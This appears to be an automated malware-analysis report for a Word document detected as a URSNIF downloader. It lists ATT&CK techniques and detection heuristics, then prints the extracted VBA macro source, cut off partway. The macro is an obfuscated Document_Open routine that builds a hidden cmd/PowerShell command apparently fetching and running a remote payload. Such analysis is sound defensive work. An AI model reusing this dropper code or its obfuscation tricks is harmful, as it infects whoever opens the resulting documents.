MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute a command. This indicates an attempt to download and run a secondary payload. ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports this malicious behavior.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6749 bytes |
SHA-256: 7a9db0b3c2f2d6163800ab65cc469f25c12bd761303af9e4214ef45d633ec0ab |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wUqniJN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
VarType "2199" + "4777" + "6502" + "JduA"
VarType "YJQjhoTUaG" + "9273"
VarType "mShb" + "495619813" + "o" + "1217"
VarType "QAUYYZv" + "QT" + "QuYoQwzsms" + "3522"
VarType "26951348" + "27721404"
VarType "457642371" + "Zw" + "poutjpbQzdl" + "rBTj"
VarType "p" + "kVQWTk"
VarType "pwKWmshc" + "8038"
Shell sHUrUVruHj + UkiNZL + kuRhihOo + SuZpUo, Format(vbHide)
VarType "QLib" + "291068158"
VarType "PNrPClXjF" + "8016"
End Sub
Attribute VB_Name = "JViqjNE"
Function sHUrUVruHj()
On _
Error _
Resume _
Next
VarType "O" + "8804" + "OFkuuOBUoFznw" + "DQNGWCk"
VarType "RJqw" + "5009"
VarType "l" + "jLLnqKmkqjJk"
VarType "w" + "125339705" + "TjtWlhL" + "ii"
VarType "433523758" + "423796162" + "fqBjtiC" + "bXHLlU"
EXtwYuwhGwU = Format(Chr(4 + 9 + 10 + 6 + 70)) + "m" + "d" + " " + "/V" + "^:ON/" + Format(Chr(2 + 6 + 7 + 4 + 48)) + Format(Chr(1 + 3 + 3 + 2 + 25)) + "s^e" + "^t" + " ^F" + "^w0" + "=^ " + "^ ^ "
VarType "1489" + "lnUrPQMpjvtLz"
VarType "6192" + "KF" + "5066" + "129354974"
VarType "P" + "DmBEMLm"
VarType "fImm" + "YQqLR"
hwXfBY = "^ ^" + " " + "^ ^ ^ " + "^ ^ " + "^}^}{^h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "ta" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^}" + ";^k" + "^aerb;^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^" + " m^e^t" + "^"
VarType "biJTIwq" + "URthoI"
VarType "2443" + "s" + "OfiGSr" + "7687"
VarType "aXF" + "G" + "HcDdASSVJa" + "1125"
VarType "OwA" + "cSPsv" + "LdPvzGd" + "426513014"
pmLVpi = "I^" + "-^e^k^o" + "vnI^" + ";)^F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^ ^," + "^tBK^$" + "(^el^i^" + "F^d" + "^a^o^ln" + "w^"
VarType "9566" + "441695958" + "328047719" + "pGA"
VarType "BBJG" + "GaIM"
QsMiH = "o^" + "D^.^" + "KR" + "N" + "${yr^t^"
VarType "iw" + "Nz" + "377309567" + "SIV"
VarType "136454831" + "477165620"
VarType "aQQ" + "283245583"
VarType "miSt" + "7408"
qKBXWWQdNJ = "{)lEh" + "^$ n^" + "i ^t^B" + "K^$(" + "h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^aer" + "^o^f;" + "'"
sHUrUVruHj = EXtwYuwhGwU + hwXfBY + pmLVpi + QsMiH + qKBXWWQdNJ
VarType "1258" + "ZvQtot"
VarType "1212" + "4461"
End Function
Function UkiNZL()
On _
Error _
Resume _
Next
VarType "EGBJ" + "9483" + "iRVODFXo" + "166559592"
VarType "nqA" + "aUt"
VarType "hMJE" + "3729" + "CTRWfOiihmUfQ" + "7367"
GDEiThMB = "^exe.'+" + "^Uz" + "w^" + "$+" + "'^\" + "'^+" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "i"
VarType "Pq" + "qUbwjbk"
VarType "6631" + "202324990" + "451683710" + "NFv"
oKiUd = "^l" + "^b^u^p:" + "vn" + "e$^=^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70))
VarType "vbLAMOkwDSZ" + "3273" + "pVOTEptf" + "cJ"
VarType "IVIHIH" + "A"
vrcVptR = "Z" + "^" + "$^;^'^3" + "^3^3' =" + " ^Uzw" + "^$^;" + ")^'^@" + "^'(" + "ti" + "l^pS^." + "^"
VarType "370046613" + "HOiJGVYd" + "k" + "nutBGKrQTRpSE"
VarType "5781" + "rvLXrnIX"
SDGdRjHzpD = "'^ORG" + "/se" + "^gam^" + "i/x" + "^u^" + "d^er^" + "-^d" + "emar" + "^f/s^em" + "eh^t/tn"
VarType "851" + "SisHfX" + "KuaRQPkZVr" + "1059"
VarType "jZ" + "DjPzMhONHBsJlu"
VarType "6074" + "vaQd" + "9940" + "29347307"
KSEfaAsw = "etn" + "^" + "o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "-" + "^pw" + "/m^o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + ".re^" + "se" + "y" + "la//:^p" + "t" + "^t^h"
UkiNZL = GDEiThMB + oKiUd + vrcVptR + SDGdRjHzpD + KSEfaAsw
VarType "1308" + "485983852"
VarType "JfiBOwt" + "2756" + "273624648" + "kTvUaOjFFCrjw"
End Function
Function kuRhihOo()
On _
Error _
Resume _
Next
VarType "CMqhjHAT" + "N" + "TmF" + "uzm"
VarType "UfpsajFQBoID" + "FQ"
VarType "QKGVwoW" + "1338" + "PlIW" + "8900"
knALszN = "^@" + "RY" + "^" + "WR^B/^m" + "^o" + Format(Chr(4 + 9
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.